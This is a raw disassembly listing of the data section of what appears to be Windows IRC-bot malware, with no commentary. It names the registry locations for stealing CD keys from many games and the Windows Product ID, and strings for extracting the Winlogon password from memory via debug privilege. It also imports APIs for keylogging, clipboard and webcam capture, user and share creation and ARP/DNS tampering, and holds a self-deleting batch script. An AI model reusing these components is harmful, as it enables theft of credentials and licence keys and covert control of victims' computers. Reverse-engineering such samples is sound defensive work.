aOftwareWestw_1 db 'oftware\Westwood\Tiberian Sun',0
align 10h
aRainbowSixIiiR db 'Rainbow Six III RavenShield',0
db 53h
aOftwareRedStor db 'oftware\Red Storm Entertainment\RAVENSHIELD',0
align 4
aNascarRacing20 db 'Nascar Racing 2003',0
align 10h
db 53h
aOftwareElectro db 'oftware\Electronic Arts\EA Sports\Nascar Racing 2003\ergc',0
align 4
aNascarRacing_0 db 'Nascar Racing 2002',0
align 10h
db 53h
aOftwareElect_0 db 'oftware\Electronic Arts\EA Sports\Nascar Racing 2002\ergc',0
align 4
aNhl2003 db 'NHL 2003',0
align 4
db 53h
aOftwareElect_1 db 'oftware\Electronic Arts\EA Sports\NHL 2003\ergc',0
align 4
aNhl2002 db 'NHL 2002',0
align 4
db 53h
aOftwareElect_2 db 'oftware\Electronic Arts\EA Sports\NHL 2002\ergc',0
align 4
aFifa2003 db 'FIFA 2003',0
align 4
db 53h
aOftwareElect_3 db 'oftware\Electronic Arts\EA Sports\FIFA 2003\ergc',0
align 4
aFifa2002 db 'FIFA 2002',0
align 4
db 53h
aOftwareElect_4 db 'oftware\Electronic Arts\EA Sports\FIFA 2002\ergc',0
align 4
aShogunTotalWar db 'Shogun: Total War: Warlord Edition',0
align 10h
db 53h
aOftwareElect_5 db 'oftware\Electronic Arts\EA GAMES\Shogun Total War - Warlord Editi'
db 'on\ergc',0
align 4
aNeedForSpeedUn db 'Need For Speed: Underground',0
db 53h
aOftwareElect_6 db 'oftware\Electronic Arts\EA GAMES\Need For Speed Underground\ergc',0
align 4
aNeedForSpeedHo db 'Need For Speed Hot Pursuit 2',0
align 4
aErgc db 'ergc',0
align 4
db 53h
aOftwareElect_7 db 'oftware\Electronic Arts\EA GAMES\Need For Speed Hot Pursuit 2',0
align 4
aMedalOfHonorAl db 'Medal of Honor: Allied Assault: Spearhead',0
align 10h
db 53h
aOftwareElect_8 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Sp'
db 'earhead\ergc',0
align 10h
aMedalOfHonor_0 db 'Medal of Honor: Allied Assault: Breakthrough',0
align 10h
byte_42C360 db 53h ; DATA XREF: _2:0042BAA2�w
aOftwareElect_9 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Br'
db 'eakthrough\ergc',0
align 4
aMedalOfHonor_1 db 'Medal of Honor: Allied Assault',0
align 4
db 53h
aOftwareElec_10 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault\er'
db 'gc',0
align 4
aGlobalOperatio db 'Global Operations',0
align 10h
db 53h
aOftwareElec_11 db 'oftware\Electronic Arts\EA GAMES\Global Operations\ergc',0
align 4
aCommandAndCo_2 db 'Command and Conquer: Generals',0
align 4
db 53h
aOftwareElec_12 db 'oftware\Electronic Arts\EA GAMES\Generals\ergc',0
aJamesBond007Ni db 'James Bond 007: Nightfire',0
align 4
db 53h
aOftwareElec_13 db 'oftware\Electronic Arts\EA GAMES\James Bond 007 Nightfire\ergc',0
aCommandAndCo_3 db 'Command and Conquer: Generals (Zero Hour)',0
align 4
db 53h
aOftwareElec_14 db 'oftware\Electronic Arts\EA GAMES\Command and Conquer Generals Zer'
db 'o Hour\ergc',0
align 4
aBlackAndWhite db 'Black and White',0
db 53h
aOftwareElec_15 db 'oftware\Electronic Arts\EA GAMES\Black and White\ergc',0
align 4
aBattlefieldVie db 'Battlefield Vietnam',0
db 53h
aOftwareElec_16 db 'oftware\Electronic Arts\EA GAMES\Battlefield Vietnam\ergc',0
align 4
aBattlefield194 db 'Battlefield 1942 (Secret Weapons of WWII)',0
align 4
db 53h
aOftwareElec_17 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942 Secret Weapons '
db 'of WWII\ergc',0
align 4
aBattlefield1_0 db 'Battlefield 1942 (Road To Rome)',0
db 53h
aOftwareElec_18 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942 The Road to Rom'
db 'e\ergc',0
align 4
aBattlefield1_1 db 'Battlefield 1942',0
align 4
db 53h
aOftwareElec_19 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942\ergc',0
aFreedomForce db 'Freedom Force',0
align 10h
db 53h
aOftwareElec_20 db 'oftware\Electronic Arts\EA Distribution\Freedom Force\ergc',0
aIgi2CovertStri db 'IGI 2: Covert Strike',0
align 4
db 53h
aOftwareIgi2Ret db 'oftware\IGI 2 Retail',0
align 4
aUnrealTourname db 'Unreal Tournament 2004',0
align 4
db 53h
aOftwareUnrealT db 'oftware\Unreal Technology\Installed Apps\UT2004',0
align 4
aUnrealTourna_0 db 'Unreal Tournament 2003',0
align 10h
db 53h
aOftwareUnrea_0 db 'oftware\Unreal Technology\Installed Apps\UT2003',0
align 4
aMicrosoftWindo db 'Microsoft Windows Product ID',0
align 4
aProductid db 'ProductId',0
align 10h
db 53h
aOftwareMicroso db 'oftware\Microsoft\Windows\CurrentVersion',0
align 4
aSoldiersOfAnar db 'Soldiers Of Anarchy',0
aSoftwareSilver db 'Software\Silver Style Entertainment\Soldiers Of Anarchy\Settings',0
align 4
aLegendsOfMight db 'Legends of Might and Magic',0
align 10h
aCustomernumber db 'CustomerNumber',0
align 10h
aSoftware3d0Sta db 'Software\3d0\Status',0
aIndustryGiant2 db 'Industry Giant 2',0
align 4
aPrvkey db 'prvkey',0
align 10h
aSoftwareJowood db 'Software\JoWooD\InstalledGames\IG2',0
align 4
aHalfLife db 'Half-Life',0
align 10h
aSoftwareValveH db 'Software\Valve\Half-Life\Settings',0
align 4
aGunmanChronicl db 'Gunman Chronicles',0
align 4
aKey_0 db 'Key',0
aSoftwareValveG db 'Software\Valve\Gunman\Settings',0
align 4
aTheGladiators db 'The Gladiators',0
align 4
aRegnumber db 'RegNumber',0
align 4
aSoftwareEugenS db 'Software\Eugen Systems\The Gladiators',0
align 10h
aCounterStrikeR db 'Counter-Strike (Retail)',0
aCdkey db 'CDKey',0
align 10h
aSoftwareValveC db 'Software\Valve\CounterStrike\Settings',0 ; DATA XREF: _2:off_42B894�o
align 4
asc_42CA98: ; DATA XREF: sub_408C26+E9�o
; sub_408C26+F4�o
unicode 0, <=>,0
aR: ; DATA XREF: sub_408C26+8F�o
; sub_40EE72:loc_413643�o
unicode 0, <r>,0
aSS_3 db '%s\%s',0 ; DATA XREF: sub_408C26+7E�o
; sub_408EE5+45�o ...
align 4
aSCdKeyS_ db '%s CD Key: (%s).',0 ; DATA XREF: sub_408C26+2B�o
align 4
unk_42CABC db 2 ; DATA XREF: sub_408DCA+C8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFilesFoundD_ db ' Files found: %d.',0
unk_42CAEC db 2 ; DATA XREF: sub_408DCA+5C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSearchingForFi db ' Searching for file: %s.',0
align 4
aFoundSS db ' Found: %s\%s',0 ; DATA XREF: sub_408EE5+107�o
align 4
aS_5 db '%s\*',0 ; DATA XREF: sub_408EE5+1A�o
align 4
unk_42CB3C db 2 ; DATA XREF: sub_409037:loc_4091B0�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToEnable db ' Failed to enable Debug Privilege.',0
align 10h
unk_42CB80 db 2 ; DATA XREF: sub_409037:loc_409183�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUnableToFindWi db ' Unable to find Winlogon Process ID.',0
unk_42CBC4 db 2 ; DATA XREF: sub_409037:loc_40917C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUnableToFindTh db ' Unable to find the password in memory.',0
align 4
unk_42CC0C db 2 ; DATA XREF: sub_409037+117�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aTheWindowsLogo db ' The Windows logon (Pid: <%d>) information is: Domain: \\%S, Us'
db 'er: (%S/(no password)).',0
align 4
aUserdomain: ; DATA XREF: sub_409037+DC�o
unicode 0, <USERDOMAIN>,0
align 4
aUsername: ; DATA XREF: sub_409037+CE�o
unicode 0, <USERNAME>,0
align 10h
aRtlrundecodeun db 'RtlRunDecodeUnicodeString',0 ; DATA XREF: sub_409037+9A�o
align 4
aRtldestroyquer db 'RtlDestroyQueryDebugBuffer',0 ; DATA XREF: sub_409037+8D�o
align 4
aRtlqueryproces db 'RtlQueryProcessDebugInformation',0 ; DATA XREF: sub_409037+80�o
aRtlcreatequery db 'RtlCreateQueryDebugBuffer',0 ; DATA XREF: sub_409037+73�o
align 4
aNtquerysystemi db 'NtQuerySystemInformation',0 ; DATA XREF: sub_409037+68�o
align 10h
aNtdll_dll db 'NTDLL.DLL',0 ; DATA XREF: sub_409037+55�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_409037+40�o
; sub_409037+161�o ...
align 10h
unk_42CD60 db 2 ; DATA XREF: sub_409037+35�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aOnlySupportedO db ' Only supported on Windows NT/2000.',0
align 4
aMsgina db 'MSGINA',0 ; DATA XREF: sub_409209+13E�o
align 4
aNwgina db 'NWGINA',0 ; DATA XREF: sub_409209+123�o
align 4
aWinlogon db 'WINLOGON',0 ; DATA XREF: sub_409209+AF�o
align 10h
unk_42CDC0 db 2 ; DATA XREF: sub_40966F+70�o
; sub_409706+C7�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aTheWindowsLo_0 db ' The Windows logon (Pid: <%d>) information is: Domain: \\%S, Us'
db 'er: (%S/%S).',0
align 4
unk_42CE2C db 2 ; DATA XREF: sub_409706+E1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aTheWindowsLo_1 db ' The Windows logon (Pid: <%d>) information is: Domain: \\%S, Us'
db 'er: (%S/(N/A)).',0
align 4
aCapgetdriverde db 'capGetDriverDescriptionA',0 ; DATA XREF: sub_40981F+C50�o
align 4
aCapcreatecaptu db 'capCreateCaptureWindowA',0 ; DATA XREF: sub_40981F+C48�o
aAvicap32_dll db 'avicap32.dll',0 ; DATA XREF: sub_40981F:loc_40A45A�o
; _6:off_4E5BE8�o
align 10h
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_40981F+BE6�o
align 10h
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_40981F+BD9�o
align 10h
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_40981F+BCC�o
align 10h
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_40981F+BBF�o
align 10h
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_40981F+BB2�o
align 10h
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_40981F+BAA�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_40981F:loc_40A3BC�o
align 10h
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_40981F+B68�o
align 10h
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_40981F+B60�o
align 10h
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_40981F:loc_40A372�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_40981F+B0E�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_40981F+B01�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_40981F+AF4�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_40981F+AEC�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_40981F:loc_40A2FE�o
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_40981F+AAA�o
align 10h
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_40981F+AA2�o
align 10h
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_40981F:loc_40A2B4�o
align 10h
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_40981F+A60�o
align 10h
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_40981F+A58�o
align 4
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_40981F:loc_40A26A�o
align 4
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_40981F+9CE�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_40981F+9C1�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_40981F+9B4�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_40981F+9A7�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_40981F+99A�o
align 10h
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_40981F+98D�o
align 10h
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_40981F+980�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_40981F+973�o
align 4
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_40981F+966�o
align 4
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_40981F+959�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_40981F+951�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_40981F:loc_40A15F�o
align 10h
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_40981F+903�o
align 10h
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_40981F+8F6�o
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_40981F+8EE�o
align 10h
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_40981F:loc_40A100�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_40981F+8B4�o
align 4
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_40981F+842�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_40981F+835�o
align 10h
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_40981F+828�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_40981F+81B�o
align 4
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_40981F+80E�o
align 4
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_40981F+801�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_40981F+7F4�o
align 10h
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_40981F+7E7�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_40981F+7DA�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_40981F+7D2�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_40981F:loc_409FE0�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_40981F+688�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_40981F+67B�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_40981F+66E�o
align 10h
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_40981F+661�o
align 10h
aGethostname db 'gethostname',0 ; DATA XREF: sub_40981F+654�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_40981F+647�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_40981F+63A�o
align 4
aAccept db 'accept',0 ; DATA XREF: sub_40981F+62D�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_40981F+620�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_40981F+613�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_40981F+60B�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_40981F+5F9�o
align 10h
aRecv db 'recv',0 ; DATA XREF: sub_40981F+5EC�o
align 4
aSendto db 'sendto',0 ; DATA XREF: sub_40981F+5DF�o
align 10h
aSend db 'send',0 ; DATA XREF: sub_40981F+5D2�o
; sub_40EE72+220D�o
align 4
aNtohl db 'ntohl',0 ; DATA XREF: sub_40981F+5C5�o
align 10h
aNtohs db 'ntohs',0 ; DATA XREF: sub_40981F+5B8�o
align 4
aHtonl db 'htonl',0 ; DATA XREF: sub_40981F+5AB�o
align 10h
aHtons db 'htons',0 ; DATA XREF: sub_40981F+59E�o
align 4
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_40981F+591�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_40981F+584�o
align 10h
aConnect db 'connect',0 ; DATA XREF: sub_40981F+577�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_40981F+56A�o
aSocket db 'socket',0 ; DATA XREF: sub_40981F+55D�o
align 4
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_40981F+550�o
align 4
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_40981F+543�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_40981F+536�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_40981F+529�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_40981F+51C�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_40981F+50F�o
align 10h
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_40981F+507�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_40981F+4F6�o
align 4
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_40981F+483�o
align 4
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_40981F+476�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_40981F+469�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_40981F+45C�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_40981F+44F�o
align 10h
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_40981F+442�o
align 10h
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_40981F+435�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_40981F+428�o
align 4
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_40981F+420�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_40981F:loc_409C2E�o
align 10h
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_40981F:loc_409C06�o
align 10h
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_40981F+38F�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_40981F+382�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_40981F+375�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_40981F+368�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_40981F+35B�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_40981F+34E�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_40981F+341�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_40981F:loc_409B58�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_40981F+309�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_40981F+2FC�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_40981F:loc_409B13�o
align 4
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_40981F+2AC�o
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_40981F+29F�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_40981F+292�o
align 4
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_40981F+285�o
align 4
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_40981F+278�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_40981F+270�o
align 4
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_40981F:loc_409A7E�o
align 4
aGetforegroundw db 'GetForegroundWindow',0 ; DATA XREF: sub_40981F+21A�o
aGetwindowtexta db 'GetWindowTextA',0 ; DATA XREF: sub_40981F+20D�o
align 4
aGetkeystate db 'GetKeyState',0 ; DATA XREF: sub_40981F+200�o
aGetasynckeysta db 'GetAsyncKeyState',0 ; DATA XREF: sub_40981F:loc_409A17�o
align 4
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_40981F+1A0�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_40981F+193�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_40981F+186�o
align 10h
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_40981F+179�o
align 10h
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_40981F+16C�o
align 10h
aIswindow db 'IsWindow',0 ; DATA XREF: sub_40981F+15F�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_40981F+152�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_40981F+14A�o
align 4
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_40981F:loc_409954�o
; sub_42105F+D�o
align 4
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_40981F:loc_409927�o
align 4
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_40981F+A0�o
align 4
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_40981F+93�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_40981F+86�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_40981F+79�o
align 4
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_40981F+6C�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_40981F+5F�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_40981F+52�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_40981F+45�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_40981F+38�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_40981F+2B�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_40981F+23�o
align 4
aKernel32_dll_1 db 'kernel32.dll',0 ; DATA XREF: sub_40981F+A�o
align 4
unk_42D764 db 2 ; DATA XREF: sub_40A4AC+2F2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Fh, 72h
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDllTestComplet db ' DLL test complete.',0
align 4
aAvicap32_dllFa db 'Avicap32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+2CC�o
align 10h
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+298�o
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+264�o
align 4
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+230�o
align 4
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+1FC�o
align 4
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+1C8�o
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+194�o
align 4
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+160�o
align 4
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+12C�o
align 10h
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+F8�o
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+C4�o
align 10h
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+90�o
align 4
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+5C�o
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_40A4AC+28�o
align 10h
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_40AA35+72�o
align 4
aMirc db 'mIRC',0 ; DATA XREF: sub_40AAFA+5�o
; sub_415C5E+18�o
align 4
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_40AB7C+1C�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_40AC20+2�o
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_40AC42+140�o
align 4
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_40AC42+85�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_40AC42+48�o
align 4
unk_42D9A8 db 2 ; DATA XREF: sub_40AE02:loc_40AEC1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aNotSupportedBy db ' Not supported by this system.',0
align 4
unk_42D9E8 db 2 ; DATA XREF: sub_40AE02:loc_40AE8F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUnableToAlloca db ' Unable to allocation ARP cache.',0
align 4
unk_42DA28 db 2 ; DATA XREF: sub_40AE02:loc_40AE5B�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aArpCacheIsEmpt db ' ARP cache is empty.',0
align 4
unk_42DA5C db 2 ; DATA XREF: sub_40AE02+49�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorGettingAr db ' Error getting ARP cache: <%d>.',0
align 4
unk_42DA9C db 2 ; DATA XREF: sub_40AF86+13C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 69h, 6Eh
db 67h ; g
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
